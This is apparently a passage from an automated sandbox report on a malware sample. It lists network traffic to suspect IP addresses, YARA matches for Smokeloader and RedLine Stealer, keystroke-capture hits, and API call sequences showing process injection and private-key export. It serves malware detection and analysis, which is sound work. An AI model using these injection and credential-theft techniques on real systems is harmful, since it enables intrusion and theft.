                  Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
                  Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
                  Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
                  Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                  Source: unknownHTTPS traffic detected: 23.145.40.164:443 -> 192.168.2.4:49761 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49768 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49769 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49770 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49771 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49772 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49773 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49774 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49775 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49776 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49777 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49778 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49779 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49780 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49781 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49782 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49783 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49784 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49785 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49791 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49793 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49795 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49797 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49799 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Source: Yara matchFile source: 00000011.00000002.4175265628.0000000000F61000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.4175451887.00000000034A1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2176, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 5368, type: MEMORYSTR
                  Source: Yara matchFile source: 6.2.C35.exe.6b0e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.3.C35.exe.6c0000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.C35.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.vejhhuh.670e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.vejhhuh.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.3.vejhhuh.6d0000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.2024427682.0000000002091000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2024380318.0000000002070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000003.2264399369.00000000006C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.2315604310.00000000006E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1780526952.00000000006C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1780608383.0000000000801000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.2561731311.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.2561826979.00000000006F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000003.2510328595.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.2315554860.00000000006C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_0055162B GetKeyboardState,ToUnicode,19_2_0055162B
                  Source: C:\Users\user\AppData\Local\Temp\451E.exeCode function: 9_2_00007FF763AF3220 CertGetCertificateContextProperty,CryptAcquireCertificatePrivateKey,CryptGetUserKey,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,CryptExportKey,VirtualProtect,VirtualProtect,CryptAcquireContextA,CryptImportKey,OpenSCManagerA,OpenServiceA,QueryServiceStatusEx,OpenProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,NCryptExportKey,CertOpenStore,CertAddCertificateLinkToStore,CertSetCertificateContextProperty,PFXExportCertStoreEx,PFXExportCertStoreEx,9_2_00007FF763AF3220

                  System Summary

                  barindex
                  Source: 00000005.00000002.2024427682.0000000002091000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 00000005.00000002.2024380318.0000000002070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 00000008.00000002.2561500633.0000000000670000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000006.00000002.2315796782.00000000008AE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000000.00000002.1780503587.00000000006B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000005.00000002.2024314586.00000000006ED000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000000.00000002.1780720142.000000000090E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000006.00000002.2315604310.00000000006E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 00000000.00000002.1780526952.00000000006C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 00000000.00000002.1780608383.0000000000801000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 00000005.00000002.2024197978.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000008.00000002.2561731311.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 00000008.00000002.2561826979.00000000006F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 00000008.00000002.2562004757.000000000075D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000006.00000002.2315529494.00000000006B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000006.00000002.2315554860.00000000006C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 49%
                  Source: C:\Users\user\Desktop\v173TV3V11.exeCode function: 0_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401514
                  Source: C:\Users\user\Desktop\v173TV3V11.exeCode function: 0_2_00402F97 RtlCreateUserThread,NtTerminateProcess,0_2_00402F97
                  Source: C:\Users\user\Desktop\v173TV3V11.exeCode function: 0_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401542
                  Source: C:\Users\user\Desktop\v173TV3V11.exeCode function: 0_2_00403247 NtTerminateProcess,GetModuleHandleA,0_2_00403247
                  Source: C:\Users\user\Desktop\v173TV3V11.exeCode function: 0_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401549
                  Source: C:\Users\user\Desktop\v173TV3V11.exeCode function: 0_2_0040324F NtTerminateProcess,GetModuleHandleA,0_2_0040324F
                  Source: C:\Users\user\Desktop\v173TV3V11.exeCode function: 0_2_00403256 NtTerminateProcess,GetModuleHandleA,0_2_00403256
                  Source: C:\Users\user\Desktop\v173TV3V11.exeCode function: 0_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401557
                  Source: C:\Users\user\Desktop\v173TV3V11.exeCode function: 0_2_0040326C NtTerminateProcess,GetModuleHandleA,0_2_0040326C
                  Source: C:\Users\user\Desktop\v173TV3V11.exeCode function: 0_2_00403277 NtTerminateProcess,GetModuleHandleA,0_2_00403277
                  Source: C:\Users\user\Desktop\v173TV3V11.exeCode function: 0_2_004032C7 CreateFileW,GetForegroundWindow,NtEnumerateKey,wcsstr,0_2_004032C7
                  Source: C:\Users\user\Desktop\v173TV3V11.exeCode function: 0_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014FE
                  Source: C:\Users\user\Desktop\v173TV3V11.exeCode function: 0_2_00403290 NtTerminateProcess,GetModuleHandleA,0_2_00403290
                  Source: C:\Users\user\AppData\Roaming\bsjhhuhCode function: 5_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401514
                  Source: C:\Users\user\AppData\Roaming\bsjhhuhCode function: 5_2_00402F97 RtlCreateUserThread,NtTerminateProcess,5_2_00402F97
                  Source: C:\Users\user\AppData\Roaming\bsjhhuhCode function: 5_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401542
                  Source: C:\Users\user\AppData\Roaming\bsjhhuhCode function: 5_2_00403247 NtTerminateProcess,GetModuleHandleA,5_2_00403247
                  Source: C:\Users\user\AppData\Roaming\bsjhhuhCode function: 5_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401549
                  Source: C:\Users\user\AppData\Roaming\bsjhhuhCode function: 5_2_0040324F NtTerminateProcess,GetModuleHandleA,5_2_0040324F
                  Source: C:\Users\user\AppData\Roaming\bsjhhuhCode function: 5_2_00403256 NtTerminateProcess,GetModuleHandleA,5_2_00403256
                  Source: C:\Users\user\AppData\Roaming\bsjhhuhCode function: 5_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401557
                  Source: C:\Users\user\AppData\Roaming\bsjhhuhCode function: 5_2_0040326C NtTerminateProcess,GetModuleHandleA,5_2_0040326C
                  Source: C:\Users\user\AppData\Roaming\bsjhhuhCode function: 5_2_00403277 NtTerminateProcess,GetModuleHandleA,5_2_00403277
                  Source: C:\Users\user\AppData\Roaming\bsjhhuhCode function: 5_2_004032C7 CreateFileW,GetForegroundWindow,NtMapViewOfSection,NtDuplicateObject,NtQuerySystemInformation,NtOpenKey,strstr,wcsstr,tolower,towlower,5_2_004032C7
                  Source: C:\Users\user\AppData\Roaming\bsjhhuhCode function: 5_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_004014FE
                  Source: C:\Users\user\AppData\Roaming\bsjhhuhCode function: 5_2_00403290 NtTerminateProcess,GetModuleHandleA,5_2_00403290
                  Source: C:\Users\user\AppData\Local\Temp\C35.exeCode function: 6_2_00403043 RtlCreateUserThread,NtTerminateProcess,6_2_00403043
                  Source: C:\Users\user\AppData\Local\Temp\C35.exeCode function: 6_2_004014C4 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_004014C4
                  Source: C:\Users\user\AppData\Local\Temp\C35.exeCode function: 6_2_00401508 NtAllocateVirtualMemory,6_2_00401508
                  Source: C:\Users\user\AppData\Local\Temp\C35.exeCode function: 6_2_004014CF NtAllocateVirtualMemory,6_2_004014CF
                  Source: C:\Users\user\AppData\Local\Temp\C35.exeCode function: 6_2_004015D5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_004015D5
                  Source: C:\Users\user\AppData\Local\Temp\C35.exeCode function: 6_2_004014DE NtAllocateVirtualMemory,6_2_004014DE
                  Source: C:\Users\user\AppData\Local\Temp\C35.exeCode function: 6_2_004015DF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_004015DF
                  Source: C:\Users\user\AppData\Local\Temp\C35.exeCode function: 6_2_004015E6 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_004015E6
                  Source: C:\Users\user\AppData\Local\Temp\C35.exeCode function: 6_2_004015F2 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_004015F2
                  Source: C:\Users\user\AppData\Local\Temp\C35.exeCode function: 6_2_004014F5 NtAllocateVirtualMemory,6_2_004014F5
                  Source: C:\Users\user\AppData\Local\Temp\C35.exeCode function: 6_2_004014F8 NtAllocateVirtualMemory,6_2_004014F8
                  Source: C:\Users\user\AppData\Local\Temp\C35.exeCode function: 6_2_004014FB NtAllocateVirtualMemory,6_2_004014FB
                  Source: C:\Users\user\AppData\Roaming\vejhhuhCode function: 8_2_00403043 RtlCreateUserThread,NtTerminateProcess,8_2_00403043
                  Source: C:\Users\user\AppData\Roaming\vejhhuhCode function: 8_2_004014C4 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,8_2_004014C4
                  Source: C:\Users\user\AppData\Roaming\vejhhuhCode function: 8_2_00401508 NtAllocateVirtualMemory,8_2_00401508
                  Source: C:\Users\user\AppData\Roaming\vejhhuhCode function: 8_2_004014CF NtAllocateVirtualMemory,8_2_004014CF
                  Source: C:\Users\user\AppData\Roaming\vejhhuhCode function: 8_2_004015D5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,8_2_004015D5
                  Source: C:\Users\user\AppData\Roaming\vejhhuhCode function: 8_2_004014DE NtAllocateVirtualMemory,8_2_004014DE
                  Source: C:\Users\user\AppData\Roaming\vejhhuhCode function: 8_2_004015DF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,8_2_004015DF
                  Source: C:\Users\user\AppData\Roaming\vejhhuhCode function: 8_2_004015E6 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,8_2_004015E6
                  Source: C:\Users\user\AppData\Roaming\vejhhuhCode function: 8_2_004015F2 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,8_2_004015F2
                  Source: C:\Users\user\AppData\Roaming\vejhhuhCode function: 8_2_004014F5 NtAllocateVirtualMemory,8_2_004014F5
                  Source: C:\Users\user\AppData\Roaming\vejhhuhCode function: 8_2_004014F8 NtAllocateVirtualMemory,8_2_004014F8
                  Source: C:\Users\user\AppData\Roaming\vejhhuhCode function: 8_2_004014FB NtAllocateVirtualMemory,8_2_004014FB
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00804B92 RtlMoveMemory,NtUnmapViewOfSection,11_2_00804B92
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_008033C3 NtQueryInformationFile,11_2_008033C3
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0080349B CreateFileW,OpenProcess,NtQueryInformationProcess,NtQueryInformationProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,lstrcmpiW,NtQueryObject,StrRChrW,StrRChrW,lstrcmpiW,GetFileSize,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,CloseHandle,CloseHandle,CloseHandle,11_2_0080349B
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0080342B NtQueryObject,NtQueryObject,RtlMoveMemory,11_2_0080342B
                  Source: C:\Windows\explorer.exeCode function: 14_2_00C838B0 NtUnmapViewOfSection,14_2_00C838B0
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_034A1016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,16_2_034A1016
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_034A1A80 NtCreateSection,NtMapViewOfSection,16_2_034A1A80
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_034A1819 lstrcmpiA,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,16_2_034A1819
                  Source: C:\Windows\explorer.exeCode function: 17_2_00F6355C NtUnmapViewOfSection,17_2_00F6355C
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_00551016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,19_2_00551016
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_005518BF OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,19_2_005518BF
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_00551B26 NtCreateSection,NtMapViewOfSection,19_2_00551B26
                  Source: C:\Windows\explorer.exeCode function: 21_2_00FC370C NtUnmapViewOfSection,21_2_00FC370C
                  Source: C:\Users\user\AppData\Local\Temp\451E.exeCode function: 9_2_00007FF763AF9AC89_2_00007FF763AF9AC8
                  Source: C:\Users\user\AppData\Local\Temp\451E.exeCode function: 9_2_00007FF763AFB43C9_2_00007FF763AFB43C
                  Source: C:\Users\user\AppData\Local\Temp\451E.exeCode function: 9_2_00007FF763AFDC209_2_00007FF763AFDC20
                  Source: C:\Users\user\AppData\Local\Temp\451E.exeCode function: 9_2_00007FF763AF32209_2_00007FF763AF3220
                  Source: C:\Users\user\AppData\Local\Temp\451E.exeCode function: 9_2_00007FF763AF213C9_2_00007FF763AF213C
                  Source: C:\Users\user\AppData\Local\Temp\451E.exeCode function: 9_2_00007FF763AFA5349_2_00007FF763AFA534
                  Source: C:\Users\user\AppData\Local\Temp\451E.exeCode function: 9_2_00007FF763AFA78C9_2_00007FF763AFA78C
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0080219811_2_00802198
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0080C2F911_2_0080C2F9
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0081B35C11_2_0081B35C
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0085443811_2_00854438
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0081B97E11_2_0081B97E
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00806E6A11_2_00806E6A
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00825F0811_2_00825F08
                  Source: C:\Windows\explorer.exeCode function: 14_2_00C81E2014_2_00C81E20
                  Source: C:\Windows\explorer.exeCode function: 17_2_00F6286017_2_00F62860
                  Source: C:\Windows\explorer.exeCode function: 17_2_00F6205417_2_00F62054
                  Source: C:\Windows\explorer.exeCode function: 21_2_00FC20F421_2_00FC20F4
                  Source: C:\Windows\explorer.exeCode function: 21_2_00FC2A0421_2_00FC2A04
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\451E.exe 1B0BE4B4B45A52650502425ABBBA226CBF0CCE5959F7A178189AE9AD79AB6911
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 00808801 appears 38 times
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 00807F70 appears 31 times
                  Source: v173TV3V11.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 00000005.00000002.2024427682.0000000002091000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 00000005.00000002.2024380318.0000000002070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 00000008.00000002.2561500633.0000000000670000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
